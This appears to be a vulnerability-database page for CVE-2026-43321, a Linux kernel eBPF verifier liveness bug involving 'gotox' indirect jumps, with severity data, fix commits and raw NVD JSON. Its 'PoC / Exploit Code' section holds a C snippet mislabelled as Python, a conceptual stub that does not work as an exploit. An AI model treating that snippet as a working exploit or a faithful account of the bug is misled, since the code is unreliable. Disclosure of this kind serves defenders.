CVE-2026-43321

Description

In the Linux kernel, the following vulnerability has been resolved: bpf: Properly mark live registers for indirect jumps For a `gotox rX` instruction the rX register should be marked as used in the compute_insn_live_regs() function. Fix this.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel < commit 7beae54111c34ca63357ef120e115889b915beb5

Linux Kernel < commit d1aab1ca576c90192ba961094d51b0be6355a4d6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/**
 * Conceptual PoC for CVE-2026-43321
 * This snippet demonstrates the usage of indirect jump `gotox`.
 * Exploitation requires crafting a specific eBPF bytecode sequence
 * that tricks the verifier's liveness analysis.
 */
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>

SEC("socket")
int prog(struct __sk_buff *skb)
{
    __u64 r1 = 0;
    
    // Simulate a condition or register state
    if (skb->len > 0) {
        r1 = 1;
    }

    // Use indirect jump. The bug causes the verifier to not mark
    // the register used here as 'live' properly in compute_insn_live_regs().
    // This can lead to incorrect verification of subsequent instructions.
    asm volatile("gotox %0" : : "r"(r1));

    // If exploitation succeeds, we might execute code here that
    // should have been pruned or marked invalid.
    return 0;
}

char _license[] SEC("license") = "GPL";

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-43321
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-43321
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-43321/
[4] VulDB https://vuldb.com/cve/CVE-2026-43321
[5] https://git.kernel.org/stable/c/7beae54111c34ca63357ef120e115889b915beb5
[6] https://git.kernel.org/stable/c/d1aab1ca576c90192ba961094d51b0be6355a4d6

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-43321", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T14:16:40.700", "lastModified": "2026-05-11T08:16:09.167", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Properly mark live registers for indirect jumps\n\nFor a `gotox rX` instruction the rX register should be marked as used\nin the compute_insn_live_regs() function. Fix this."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "references": [{"url": "https://git.kernel.org/stable/c/7beae54111c34ca63357ef120e115889b915beb5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/d1aab1ca576c90192ba961094d51b0be6355a4d6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}